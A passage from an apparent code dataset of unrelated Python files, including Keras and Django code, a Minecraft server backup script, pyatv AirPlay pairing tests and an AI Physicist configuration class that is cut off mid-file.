'timestamp', 'longitude', 'latitude', 'carrierName', 'vesselMMSI', 'onboardDate', 'ETA', 'creatDate']]\n\n\n# In[71]:\n\n\n#转换格式\nresult2['onboardDate'] = pd.to_datetime(result2['onboardDate'])\nresult2['onboardDate'] = result2['onboardDate'].apply(lambda x:x.strftime('%Y/%m/%d %H:%M:%S'))\nresult2['ETA'] = pd.to_datetime(result2['ETA'])\nresult2['ETA'] = result2['ETA'].apply(lambda x:x.strftime('%Y/%m/%d %H:%M:%S'))\nresult2['creatDate'] = pd.to_datetime(result2['creatDate'])\nresult2['creatDate'] = result2['creatDate'].apply(lambda x:x.strftime('%Y/%m/%d %H:%M:%S'))\n\n\n# In[ ]:\n\n\n#保存得到的结果\nresult2.to_csv('./result/A4.csv')\n\n","sub_path":"BDC2020无能万金油-复赛/model_A4.py","file_name":"model_A4.py","file_ext":"py","file_size_in_byte":37084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"38903230","text":"import itertools \n\nimport numpy as np \nimport tensorflow as tf\nfrom keras.layers import Input, Dense\nfrom keras.models import Model \nfrom keras.datasets import mnist \nfrom keras.optimizers import Adam\nfrom keras.losses import mean_squared_error, categorical_crossentropy\nfrom keras.metrics import categorical_accuracy\n\ndef build_softmax_model():\n inputs = Input(shape=(200,))\n outputs = Dense(10, activation='softmax')(inputs)\n model = Model(inputs, outputs)\n return model\n\ndef build_ae_model():\n inputs = Input(shape=(28*28,))\n \n x_encoder = Dense(512, activation='relu', use_bias=True)(inputs)\n x_encoder = Dense(200, activation='relu', use_bias=True)(x_encoder)\n x_decoder = Dense(512, activation='relu', use_bias=True)(x_encoder)\n x_decoder = Dense(28*28, activation='relu', use_bias=True)(x_decoder)\n outputs = x_decoder \n \n encoder = Model([inputs], [x_encoder])\n decoder = None\n ae_model = Model([inputs], [outputs])\n \n x_softmax = Dense(10, activation='softmax')(x_encoder)\n softmax_model = Model([inputs], [x_softmax])\n return encoder, decoder, ae_model, softmax_model\n\ndef main(): \n (x_train, y_train), (x_test, y_test) = mnist.load_data()\n x_train = np.reshape(x_train, (-1, 28*28*1))\n x_test = np.reshape(x_test, (-1, 28*28*1))\n x_train = x_train/255.0\n x_test = x_test/255.0\n\n temp = np.zeros((y_train.shape[0],10))\n for i in range(y_train.shape[0]):\n temp[i, y_train[i]] = 1\n y_train = temp\n\n temp = np.zeros((y_test.shape[0],10))\n for i in range(y_test.shape[0]):\n temp[i, y_test[i]] = 1\n y_test = temp\n \n encoder, _, ae, _ = build_convae_model()\n ae.compile(optimizer=Adam(), loss=[mean_squared_error], metrics=[mean_squared_error])\n\n classifier = build_softmax_model()\n classifier.compile(optimizer=Adam(), loss=[categorical_crossentropy], metrics=[categorical_accuracy])\n \n for i in range(100):\n ae.fit(x_train, x_train, epochs=1, verbose=0)\n x_decode_train = encoder.predict(x_train)\n x_decode_test = encoder.predict(x_test)\n classifier.fit(x_decode_train, y_train, epochs=1, verbose=0)\n print(classifier.evaluate(x_decode_test, y_test, verbose=0))\n\nif __name__ == '__main__': \n main()\n\n\n\n","sub_path":"ae_mnist.py","file_name":"ae_mnist.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"63357339","text":"from fvcore.common.registry import Registry\n\nLAYER_REGISTRY = Registry(\"LAYER_REGISTRY\") # noqa F401 isort:skip\nLAYER_REGISTRY.__doc__ = \"\"\"\n\n\"\"\"\n\n\ndef build_layer(cfg, **kwargs):\n \"\"\"\n Build the whole model architecture, defined by ``cfg.MODEL.META_ARCHITECTURE``.\n Note that it does not load any weights from ``cfg``.\n \"\"\"\n return LAYER_REGISTRY.get(cfg.name)(cfg=cfg, **kwargs)\n","sub_path":"exp/comm/layers/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"151905656","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Using asyncio in Python3.5\n\nimport sys\nimport asyncio\n\n\nfrom time import time\nfrom fib import log_fib\n\n\n\ndef process_input():\n text = sys.stdin.readline()\n n = int(text)\n print(\"Fib({}) = {}\".format(n, log_fib(n)))\n\nasync def print_hello():\n while True:\n print(\"{} - Async Hello\".format(int(time())))\n await asyncio.sleep(3)\n\n\ndef main():\n loop = asyncio.get_event_loop()\n loop.add_reader(sys.stdin, process_input)\n loop.run_until_complete(print_hello())\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"languages/tips/understand_asyncio/example_6.py","file_name":"example_6.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"627149354","text":"from django.db import models\nfrom datetime import datetime\n\nclass Event(models.Model):\n name = models.CharField(max_length=256)\n start_date = models.DateField(null=True, verbose_name='Date to start display')\n end_date = models.DateField(null=True, verbose_name='Date to end display')\n event_start_date = models.DateTimeField(null=True)\n event_end_date = models.DateTimeField(null=True)\n teaser = models.CharField(max_length=1024, null=True, blank=True)\n content = models.TextField(null=True)\n\n def save(self, *args, **kwargs):\n if not self.start_date:\n self.start_date = datetime.now()\n super(Event, self).save(*args, **kwargs)\n\n def get_date_string(self):\n # Saturday, December 11th, 2011 from 2 to 6 pm\n start_date = self.event_start_date\n end_date = self.event_end_date\n if not start_date:\n return ''\n\n ds = start_date.day\n if ds%10 == 1:\n ds = \"%dst\" % ds\n elif ds%10 == 2:\n ds = \"%dnd\" % ds\n elif ds%10 == 3:\n ds = \"%drd\" % ds\n else:\n ds = \"%dth\" % ds\n \n if start_date.year == end_date.year and start_date.month == end_date.month and start_date.day == end_date.day:\n # Same day\n ds = start_date.strftime('%A, %B') + (\" %s \" % ds) + start_date.strftime('%Y') + \" from\"\n if start_date.strftime('%p') == end_date.strftime('%p'):\n ds = \"%s %d to %d %s\" % (ds, start_date.strftime('%I'), end_date.strftime('%I'), start_date.strftime('%p'))\n else:\n ds = \"%s %d %s to %d %s\" % (ds, start_date.strftime('%I'), start_date.strftime('%p'), end_date.strftime('%I'), end_date.strftime('%p'))\n else:\n ds = start_date.strftime('%A, %B') + \" until \" + end_date.strftime('%A, %B')\n return ds\n \n date_string = property(get_date_string)\n","sub_path":"apps/event/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"156563063","text":"import json\n\nfrom django.test import Client\nfrom django.urls import reverse\nfrom rest_framework.test import APITestCase\nfrom base.models.evaluation import Evaluation\n\n\nclass TestPokemonApi(APITestCase):\n url = reverse('evaluation_detail')\n\n def test_fair_trade(self):\n \"\"\"Evaluate two lists of my and their pokemon\"\"\"\n data = {\n \"my\": [{\"name\": \"Ninetales\"}, {\"name\": \"ninetales\"}],\n \"their\": [{\"name\": \"ninetales\"}, {\"name\": \"nineTales\"}]\n }\n response = Client().post(self.url, json.dumps(data), content_type='application/json')\n self.assertEqual(200, response.status_code)\n self.assertEqual(True, response.data.get('good_trade'))\n self.assertEqual(354, response.data.get('my_total_base_experience'))\n self.assertEqual(354, response.data.get('their_total_base_experience'))\n\n def test_fair_trade_with_unknown_pokemon(self):\n data = {\n \"my\": [{\"name\": \"ablubleble\"}, {\"name\": \"ninetales\"}],\n \"their\": [{\"name\": \"ninetales\"}, {\"name\": \"nineTales\"}]\n }\n response = Client().post(self.url, json.dumps(data), content_type='application/json')\n self.assertEqual(404, response.status_code)\n\n def test_sum_base_experience(self):\n lista = [{\"name\": \"Ninetales\"}, {\"name\": \"ninetales\"}]\n sum, objs = Evaluation().sum_base_experience(lista)\n self.assertEqual(354, sum)\n self.assertEqual(len(lista), len(objs))\n\n def test_evaluate_by_base_experience(self):\n result = Evaluation().evaluate_by_base_experience(354, 354)\n self.assertEqual(True, result)\n\n def test_evaluate_by_bad_base_experience(self):\n result = Evaluation().evaluate_by_base_experience(354, 297)\n self.assertEqual(False, result)\n","sub_path":"api/base/tests/test_evaluation.py","file_name":"test_evaluation.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"214959943","text":"#!/bin/python3\nimport os, sys, time\nimport shutil\nimport threading\nimport urllib.request\nfrom zipfile import *\n\nfrom config import *\n\ndef backup():\n bkp_dir_tmp = \"%s/%s\" % (bkp_path, time.strftime(\"%Y-%m-%d\"))\n try:\n os.stat(bkp_dir_tmp)\n except:\n os.mkdir(bkp_dir_tmp)\n zf = ZipFile(\"%s/%s.zip\" % (bkp_dir_tmp, time.strftime(\"%H-%M-%S\")), \"w\", compression=ZIP_LZMA)\n for dirname, subdirs, files in os.walk(\"./%s\" % world):\n zf.write(dirname)\n for filename in files:\n zf.write(os.path.join(dirname, filename))\n zf.close()\n\ndef clean_old():\n for subdir, dirs, files in os.walk(bkp_path):\n iterator = 0\n for directory in sorted(dirs):\n if iterator >= len(dirs) - bkp_keep:\n break\n shutil.rmtree(\"%s/%s\" % (bkp_path, directory))\n iterator += 1\n break\n\ndef update_server():\n filelist = [ f for f in os.listdir(\".\") if f.endswith(\".jar\") ]\n for f in filelist:\n os.remove(f)\n urllib.request.urlretrieve(dl_link, srv_file)\n print(\"Updated server to %s.\" % mc_ver)\n\ndef backup_thread():\n if backup:\n while True:\n backup()\n if bkp_keep != 0:\n clean_old()\n time.sleep(3600 * bkp_interval)\n\ndef server_thread():\n os.system(\"java -jar %s --nogui\" % srv_file)\n\nbackup_thread_v = threading.Thread(target=backup_thread)\nbackup_thread_v.setDaemon(True)\n\nthreads = [backup_thread_v]\nif __name__ == \"__main__\":\n if not os.path.exists(srv_file):\n update_server()\n if (not os.path.exists('eula.txt')) and eula_accept:\n eula=open('eula.txt','w')\n eula.write(\"eula=true\")\n eula.close()\n\n backup_thread_v.start()\n server_thread()\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"275518509","text":"#!/usr/bin/env python\n# -*- mode: python; indent-tabs-mode: nil; -*- coding: utf-8 -*-\n\n\"\"\"\nSearchPage.py\n\nCopyright 2009-2012 by Marcello Perathoner\n\nDistributable under the GNU General Public License Version 3 or newer.\n\nThe various flavors of search page.\n\n\"\"\"\n\nfrom __future__ import unicode_literals\n\nimport cherrypy\n\nfrom libgutenberg.MediaTypes import mediatypes as mt\nfrom libgutenberg.DublinCore import DublinCore\n\nimport BaseSearcher\nfrom Page import SearchPage\n\n\nclass BookSearchPage (SearchPage):\n \"\"\" search term => list of books \"\"\"\n\n def setup (self, os, sql):\n os.sort_orders = ('downloads', 'release_date', 'title', 'random')\n os.icon = 'book'\n os.class_ += 'booklink'\n os.f_format_icon = os.format_icon_titles\n\n if os.sort_order == 'random':\n sql.where.append (\"\"\"\n pk in (select floor (random () * maxbook)::integer\n from generate_series (1, 30), (select max (pk) as maxbook\n from books) xbks1)\n \"\"\")\n\n if len (os.query):\n sql.fulltext ('books.tsvec', os.query)\n os.title = _(\"Books: {title}\").format (title = os.query)\n else:\n os.title = _('All Books')\n\n\n def fixup (self, os):\n \"\"\" strip marc subfields, add social media hints and facet links \"\"\"\n\n for e in os.entries:\n if '$' in e.title:\n e.title = DublinCore.strip_marc_subfields (e.title)\n\n if (os.sort_order == 'release_date' and os.total_results > 0 and os.start_index == 1):\n cat = BaseSearcher.Cat ()\n cat.title = _('Follow new books on Twitter')\n cat.subtitle = _(\"Follow our new books on Twitter.\")\n cat.url = 'https://twitter.com/gutenberg_new'\n cat.class_ += 'navlink grayed'\n cat.icon = 'twitter'\n cat.order = 5\n os.entries.insert (0, cat)\n\n cat = BaseSearcher.Cat ()\n cat.title = _('Follow new books on Facebook')\n cat.subtitle = _(\"Follow the link and like the page to have us post new books to your wall.\")\n cat.url = 'https://www.facebook.com/gutenberg.new'\n cat.class_ += 'navlink grayed'\n cat.icon = 'facebook'\n cat.order = 5\n os.entries.insert (0, cat)\n\n if (len (os.query) and os.start_index == 1):\n sql2 = BaseSearcher.SQLStatement ()\n sql2.query = \"select count (*) from bookshelves\"\n sql2.fulltext ('bookshelves.tsvec', os.query)\n rows = BaseSearcher.SQLSearcher.execute (*sql2.build ())\n if rows[0][0] > 0:\n cat = BaseSearcher.Cat ()\n cat.rel = 'related'\n cat.title = _('Bookshelves')\n cat.subtitle = __('One bookshelf matches your query.',\n '{count} bookshelves match your search.',\n rows[0][0]).format (count = rows[0][0])\n cat.url = os.url ('bookshelf_search', query = os.query)\n cat.class_ += 'navlink grayed'\n cat.icon = 'bookshelf'\n cat.order = 3\n os.entries.insert (0, cat)\n\n sql2 = BaseSearcher.SQLStatement ()\n sql2.query = \"select count (*) from subjects\"\n sql2.fulltext ('subjects.tsvec', os.query)\n rows = BaseSearcher.SQLSearcher.execute (*sql2.build ())\n if rows[0][0] > 0:\n cat = BaseSearcher.Cat ()\n cat.rel = 'related'\n cat.title = _('Subjects')\n cat.subtitle = __('One subject heading matches your search.',\n '{count} subject headings match your search.',\n rows[0][0]).format (count = rows[0][0])\n cat.url = os.url ('subject_search', query = os.query)\n cat.class_ += 'navlink grayed'\n cat.icon = 'subject'\n cat.order = 3\n os.entries.insert (0, cat)\n\n sql2 = BaseSearcher.SQLStatement ()\n sql2.query = \"select count (*) from authors\"\n sql2.fulltext ('authors.tsvec', os.query)\n rows = BaseSearcher.SQLSearcher.execute (*sql2.build ())\n if rows[0][0] > 0:\n cat = BaseSearcher.Cat ()\n cat.rel = 'related'\n cat.title = _('Authors')\n cat.subtitle = __('One author name matches your search.',\n '{count} author names match your search.',\n rows[0][0]).format (count = rows[0][0])\n cat.url = os.url ('author_search', query = os.query)\n cat.class_ += 'navlink grayed'\n cat.icon = 'author'\n cat.order = 3\n os.entries.insert (0, cat)\n\n\nclass AuthorSearchPage (SearchPage):\n \"\"\" name => list of authors \"\"\"\n\n def setup (self, os, sql):\n os.f_format_subtitle = os.format_subtitle\n os.f_format_url = BaseSearcher.SearchUrlFormatter ('author')\n os.f_format_thumb_url = os.format_none\n os.sort_orders = ('downloads', 'quantity', 'alpha', 'release_date')\n os.icon = 'author'\n os.class_ += 'navlink'\n os.title = _('All Authors')\n\n sql.query = \"\"\"\n SELECT\n authors.author as title,\n coalesce (authors.born_floor || '', '') || '-' ||\n coalesce (authors.died_floor || '', '') as subtitle,\n authors.pk as pk,\n max (books.release_date) as release_date,\n sum (books.downloads) as downloads,\n count (books.pk) as quantity\"\"\"\n\n sql.from_ = ('authors', 'mn_books_authors as mn', 'books')\n sql.groupby += ('authors.author', 'subtitle', 'authors.pk')\n sql.where.append ('authors.pk = mn.fk_authors')\n sql.where.append ('books.pk = mn.fk_books')\n\n if len (os.query):\n sql.fulltext ('authors.tsvec', os.query)\n os.title = _(\"Authors: {author}\").format (author = os.query)\n else:\n sql.where.append (\"authors.author not in ('Various', 'Anonymous', 'Unknown')\")\n\n\nclass SubjectSearchPage (SearchPage):\n \"\"\" term => list of subects \"\"\"\n\n def setup (self, os, sql):\n os.f_format_url = BaseSearcher.SearchUrlFormatter ('subject')\n os.f_format_thumb_url = os.format_none\n os.sort_orders = ('downloads', 'quantity', 'alpha', 'release_date')\n os.icon = 'subject'\n os.class_ += 'navlink'\n os.title = _('All Subjects')\n\n sql.query = \"\"\"\n SELECT\n subjects.subject as title,\n subjects.pk as pk,\n max (books.release_date) as release_date,\n sum (books.downloads) as downloads,\n count (books.pk) as quantity\"\"\"\n\n sql.from_ = ('subjects', 'mn_books_subjects as mn', 'books')\n sql.groupby += ('subjects.subject', 'subjects.pk')\n sql.where.append ('subjects.pk = mn.fk_subjects')\n sql.where.append ('books.pk = mn.fk_books')\n\n if len (os.query):\n sql.fulltext ('subjects.tsvec', os.query)\n os.title = _(\"Subjects: {subject}\").format (subject = os.query)\n\n\nclass BookshelfSearchPage (SearchPage):\n \"\"\" term => list of bookshelves \"\"\"\n\n def setup (self, os, sql):\n os.f_format_url = BaseSearcher.SearchUrlFormatter ('bookshelf')\n os.f_format_thumb_url = os.format_none\n os.sort_orders = ('downloads', 'quantity', 'alpha', 'release_date')\n os.icon = 'bookshelf'\n os.class_ += 'navlink'\n os.title = _('All Bookshelves')\n\n sql.query = \"\"\"\n SELECT\n bookshelves.bookshelf as title,\n bookshelves.pk as pk,\n max (books.release_date) as release_date,\n sum (books.downloads) as downloads,\n count (books.pk) as quantity\"\"\"\n\n sql.from_ = ('bookshelves', 'mn_books_bookshelves as mn', 'books')\n sql.groupby += ('bookshelves.bookshelf', 'bookshelves.pk')\n sql.where.append ('bookshelves.pk = mn.fk_bookshelves')\n sql.where.append ('books.pk = mn.fk_books')\n\n if len (os.query):\n sql.fulltext ('bookshelves.tsvec', os.query)\n os.title = _(\"Bookshelves: {bookshelf}\").format (bookshelf = os.query)\n\n\nclass AuthorPage (SearchPage):\n \"\"\" author id => books by author \"\"\"\n\n def setup (self, os, sql):\n os.sort_orders = ('downloads', 'title', 'release_date')\n os.title_icon = 'author'\n os.icon = 'book'\n os.class_ += 'booklink'\n os.f_format_icon = os.format_icon_titles\n os.author = BaseSearcher.sql_get (\n \"select author from authors where pk = %(pk)s\", pk = os.id)\n os.title = _('Books by {author}').format (author = os.author)\n\n sql.from_.append ('mn_books_authors as mn')\n sql.where.append ('books.pk = mn.fk_books')\n sql.where.append (\"mn.fk_authors = %(fk_authors)s\")\n sql.params['fk_authors'] = os.id\n\n def fixup (self, os):\n\n if (os.start_index == 1 and len (os.entries) > 1):\n\n # browse-by-author page for maintainers\n if 'is-catalog-maintainer' in cherrypy.request.cookie:\n cat = BaseSearcher.Cat ()\n cat.type = mt.html\n cat.rel = 'related'\n cat.title = _('Browse by Author')\n cat.url = \"/browse/authors/%s#a%d\" % (os.author[:1].lower (), os.id)\n cat.class_ += 'navlink grayed'\n cat.icon = 'internal'\n cat.order = 9\n os.entries.insert (0, cat)\n\n # wikipedia links etc.\n rows = BaseSearcher.SQLSearcher.execute (\n \"\"\"SELECT url, description AS title FROM author_urls\n WHERE fk_authors = %(fk_authors)s\"\"\",\n { 'fk_authors': os.id } )\n for row in rows:\n cat = BaseSearcher.Cat ()\n cat.type = mt.html\n cat.rel = 'related'\n cat.title = _('See also: {title}').format (title = row.title)\n cat.url = row.url\n cat.class_ += 'navlink grayed'\n cat.icon = 'external'\n cat.order = 8\n os.entries.insert (0, cat)\n\n # author aliases\n if os.format in ('html', 'mobile'):\n rows = BaseSearcher.SQLSearcher.execute (\n \"\"\"SELECT alias AS title FROM aliases\n WHERE fk_authors = %(fk_authors)s AND alias_heading = 1\"\"\",\n { 'fk_authors': os.id }\n )\n\n for row in rows:\n cat = BaseSearcher.Cat ()\n cat.title = _('Alias {alias}').format (alias = row.title)\n cat.class_ += 'grayed'\n cat.icon = 'alias'\n cat.order = 7\n os.entries.insert (0, cat)\n\n\nclass SubjectPage (SearchPage):\n \"\"\" subject id => books about subject \"\"\"\n\n def setup (self, os, sql):\n os.sort_orders = ('downloads', 'title', 'release_date')\n os.title_icon = 'subject'\n os.icon = 'book'\n os.class_ += 'booklink'\n os.f_format_icon = os.format_icon_titles\n os.subject = BaseSearcher.sql_get (\n \"select subject from subjects where pk = %(pk)s\", pk = os.id)\n os.title = _('Books about {subject}').format (subject = os.subject)\n\n sql.from_.append ('mn_books_subjects as mn')\n sql.where.append ('books.pk = mn.fk_books')\n sql.where.append (\"mn.fk_subjects = %(fk_subjects)s\")\n sql.params['fk_subjects'] = os.id\n\n\nclass BookshelfPage (SearchPage):\n \"\"\" bookshelf id => books on bookshelf \"\"\"\n\n def setup (self, os, sql):\n os.sort_orders = ('downloads', 'title', 'release_date')\n os.title_icon = 'bookshelf'\n os.icon = 'book'\n os.class_ += 'booklink'\n os.f_format_icon = os.format_icon_titles\n os.bookshelf = BaseSearcher.sql_get (\n \"select bookshelf from bookshelves where pk = %(pk)s\", pk = os.id)\n os.title = _('Books in {bookshelf}').format (bookshelf = os.bookshelf)\n\n sql.from_.append ('mn_books_bookshelves as mn')\n sql.where.append ('books.pk = mn.fk_books')\n sql.where.append (\"mn.fk_bookshelves = %(fk_bookshelves)s\")\n sql.params['fk_bookshelves'] = os.id\n\n\nclass AlsoDownloadedPage (SearchPage):\n \"\"\" ebook id => books people also downloaded \"\"\"\n\n def setup (self, os, sql):\n os.sort_orders = ('downloads', )\n os.icon = 'book'\n os.class_ += 'booklink'\n os.f_format_icon = os.format_icon_titles\n os.title = _('Readers also downloaded')\n\n sql.query = \"\"\"\n SELECT\n books.pk,\n books.title,\n books.filing,\n books.author,\n books.release_date,\n books.fk_categories,\n books.fk_langs,\n books.coverpages,\n d.dl as downloads\n FROM\n v_appserver_books_4 as books\n JOIN (\n SELECT\n s1.fk_books as pk, count (s1.id) as dl\n FROM\n scores.also_downloads as s1,\n scores.also_downloads as s2\n WHERE s2.fk_books = %(fk_books)s\n AND s1.fk_books != %(fk_books)s\n AND s1.id = s2.id\n GROUP BY s1.fk_books) as d\n ON d.pk = books.pk\"\"\"\n sql.from_ = ()\n sql.params['fk_books'] = os.id\n\n\n def finalize (self, os):\n # one page is enough\n os.show_next_page_link = False\n","sub_path":"SearchPage.py","file_name":"SearchPage.py","file_ext":"py","file_size_in_byte":14240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"91411641","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom datetime import datetime, timedelta\nfrom sortedcontainers import SortedList\n\nfrom .games import games\nfrom .streams import streams\nfrom ..utils import load_json\n\n\nclass Category:\n @staticmethod\n def from_dict(data, games=[]):\n self = Category(**data)\n\n for game in games.copy():\n if self.code == game.category:\n if not game.type:\n self.games.add(game)\n elif game.type == 'list':\n self.games.update(game.streams)\n\n games.remove(game)\n\n return self\n\n def __init__(self, **kwargs):\n def attr(key, default=None):\n setattr(self, key, kwargs.get(key, default))\n\n for key in ['name', 'code', 'description', 'split_by_year', 'search']:\n attr(key)\n\n attr('level', 2)\n\n self.games = SortedList(key=lambda x: x.date)\n\n\nclass Categories(dict):\n def __init__(self, data):\n if type(data) is not list:\n raise TypeError\n\n uncategorized = games.copy()\n\n for category in data:\n if category['code'] == 'recent':\n c = Category.from_dict(category)\n last_segments = list(streams.segments)[-10:]\n\n for segment in last_segments:\n c.games.add(segment.reference())\n else:\n c = Category.from_dict(category, games=uncategorized)\n\n self[c.code] = c\n\n month_ago = datetime.now() - timedelta(days=30)\n \n if 'ongoing' in self and 'abandoned' in self:\n for game in self['ongoing'].games.copy():\n if game.streams[-1].date < month_ago:\n self['ongoing'].games.remove(game)\n self['abandoned'].games.add(game)\n\n if len(uncategorized) > 0:\n names = [f'{game.name} ({game.category})'\n for game in uncategorized]\n raise(AttributeError('Invalid category in ' + ', '.join(names)))\n\n\ncategories = Categories(load_json('data/categories.json'))","sub_path":"templates/data/categories.py","file_name":"categories.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"529594466","text":"\"\"\"Functional pairing tests using the API with a fake AirPlay Apple TV.\"\"\"\n\nfrom aiohttp.test_utils import (AioHTTPTestCase, unittest_run_loop)\n\nimport pyatv\nfrom pyatv import const\nfrom pyatv.conf import (AirPlayService, AppleTV)\nfrom tests.airplay.fake_airplay_device import (\n FakeAirPlayDevice, AirPlayUseCases, DEVICE_CREDENTIALS, DEVICE_PIN)\n\n\nclass PairFunctionalTest(AioHTTPTestCase):\n\n def setUp(self):\n AioHTTPTestCase.setUp(self)\n self.pairing = None\n\n self.service = AirPlayService(\n 'airplay_id', credentials=DEVICE_CREDENTIALS,\n port=self.server.port)\n self.conf = AppleTV('127.0.0.1', 'Apple TV')\n self.conf.add_service(self.service)\n\n async def tearDownAsync(self):\n await self.pairing.close()\n await super().tearDownAsync()\n\n async def get_application(self, loop=None):\n self.fake_atv = FakeAirPlayDevice(self)\n self.usecase = AirPlayUseCases(self.fake_atv)\n return self.fake_atv.app\n\n async def initiate_pairing(self):\n self.usecase.airplay_require_authentication()\n\n options = {}\n\n self.pairing = await pyatv.pair(\n self.conf, const.PROTOCOL_AIRPLAY, self.loop, **options)\n\n @unittest_run_loop\n async def test_pairing_with_device(self):\n await self.initiate_pairing()\n\n self.assertTrue(self.pairing.device_provides_pin)\n\n await self.pairing.begin()\n self.pairing.pin(DEVICE_PIN)\n\n self.assertFalse(self.pairing.has_paired)\n\n await self.pairing.finish()\n self.assertTrue(self.pairing.has_paired)\n self.assertEqual(self.service.credentials, DEVICE_CREDENTIALS)\n","sub_path":"tests/airplay/test_airplay_pair.py","file_name":"test_airplay_pair.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"341001176","text":"\"\"\"URLs to run the tests.\"\"\"\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\n\n\nadmin.autodiscover()\n\nurlpatterns = [\n url(r'^admin/', include(admin.site.urls)),\n url(r'^careers/', include('careers.urls')),\n url(r'^markdown/', include('django_markdown.urls')),\n]\n","sub_path":"careers/tests/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"161596326","text":"from AI_physicist.theory_learning.util_theory import get_mystery\nimport datetime\n\n\nclass Options(object):\n def __init__(self):\n ########################################\n # Setting up path to dataset files. The data files are CSV_DIRNAME + env_name + \".csv\",\n # where env_name are elements in the csv_filename_list. For each csv file, the first\n # (num_output_dims * num_input_steps) columns are the past (E.g., if num_output_dims=2, then\n # they are arranged as (x_{t-num_input_steps}, y_{t-num_input_steps}, ... x_{t-1}, y_{t-1}) ).\n # The next num_output_dims columns are the target prediction for the future.\n # If is_classified = True, the last column in the csv should provide the true_domain id for evaluating\n # whether the domain prediction is correct (not used for training)\n ########################################\n self.is_classified = True # If True, the last column in the csv file should provide the true_domain id for\n # evaluation.\n self.csv_filename_list = get_mystery(\n 50000, range(4, 7), range(1, 6), self.is_classified) + get_mystery(\n 50000, [20], range(1, 6), self.is_classified) + get_mystery(50000, range(7, 11), range(1, 6),\n self.is_classified)\n self.num_output_dims = 2 # It sets the dimension of output\n self.num_input_steps = 2 # It sets the number of steps for the input\n self.exp_mode = \"continuous\" # Choose from \"continuous\" (full AI Physicist), \"newb\" (newborn) and \"base\" (\n # baseline)\n self.forward_steps = 1 # Number of forward steps to predict\n self.data_format = \"states\" # Choose from \"states\" or \"images\"\n self.pred_nets_activation = \"linear\" # Activation for the prediction function f. Choose from \"linear\",\n # \"leakyRelu\"\n self.num_layers = 3 # Number of layers for the prediction function f.\n\n self.num_theories_init = 4 # Number of theories to start with.\n self.add_theory_loss_threshold = 2e-6 # MSE threshold for individual data points above which to add a new\n # theory to fit.\n self.add_theory_criteria = (\"loss_with_domain\",\n 0) # Criteria and threshold of loss increase to determine whether to accept adding the theory.\n self.add_theory_quota = 1 # maximum number of theories to add at each phase.\n self.add_theory_limit = None # maximum allowed number of theories. If None, do not set limit.\n\n self.is_Lagrangian = False # If True, learn the Lagrangian. If False, learn Equation of Motion (EOM).\n self.load_previous = True # Whether to load previously trained instances on\n\n # Other settings:\n self.exp_id = \"exp1.0\"\n self.env_source = \"file\"\n self.pred_nets_neurons = 8\n self.domain_net_neurons = 8\n self.domain_pred_mode = \"onehot\"\n self.mse_amp = 1e-7\n self.scheduler_settings = (\"ReduceLROnPlateau\", 40, 0.1) # Settings for the learning rate scheduler\n # scheduler_settings = (\"LambdaLR\", \"exp\", 2, False) # Settings for the learning rate scheduler\n self.simplify_criteria = (\"DLs\", 0, 3,\n \"relative\") # The (criteria type, threshold, patience, compare_mode) upon which not satisfied, we break the current simplification and continue to the next layer/model\n self.optim_type = (\"adam\", 5e-3)\n self.optim_domain_type = (\"adam\", 1e-3)\n self.optim_autoencoder_type = (\"adam\", 1e-5, 1e-1) # optim_type, lr, loss_scale\n self.reg_mode = \"L1\"\n self.reg_amp = 1e-8\n self.reg_smooth = None\n self.reg_domain_mode = \"L1\"\n self.reg_domain_amp = 1e-5\n self.batch_size = 10000\n self.loss_core = \"DLs\"\n self.loss_order = -1\n self.loss_decay_scale = None\n self.is_mse_decay = False\n self.num_examples = 20000\n self.epochs = 10000\n self.iter_to_saturation = int(self.epochs / 2)\n self.MDL_mode = \"both\"\n self.date_time = \"{0}-{1}\".format(datetime.datetime.now().month, datetime.datetime.now().day)\n self.seed = 0\n self.array_id = \"0\"\n\n self.loss_balance_model_influence = False\n self.loss_success_threshold = 1e-4 # MSE level you regard as success\n self.theory_add_mse_threshold = 0.05 # MSE level below which you will add to the theory hub\n self.theory_remove_fraction_threshold = 0.005 # Fraction threshold below which you will remove a theory after each stage of training.\n self.matching_numerical_tolerance = 2e-4 # The tolerance below which you regard the numerical coefficient matches.\n self.matching_snapped_tolerance = 1e-9 # The tolerance below which you regard the snapped coefficient matches.\n self.max_trial_times = 1 # Maximum number of trial times before going on to next target (DEFAULT=1)\n self.is_simplify_model = True # Whether to perform simplification of theory models\n self.is_simplify_domain = False # Whether to perform simplification of theory domains\n self.record_mode = 2 # Record data mode. Choose from 0 (minimal recording), 1, 2 (record everything)\n self.show_3D_plot = False\n self.show_vs = False\n self.big_domain_dict = [\n (key, [1, 2]) for key in get_mystery([\n 20000, 30000, 40000, 50000], range(4, 7), range(11))] + [(key, [1, 2]) for key in get_mystery(\n [40000, 50000], [20], range(11))] + [(key, [1, 2, 3]) for key in get_mystery(\n [20000, 30000, 40000, 50000], 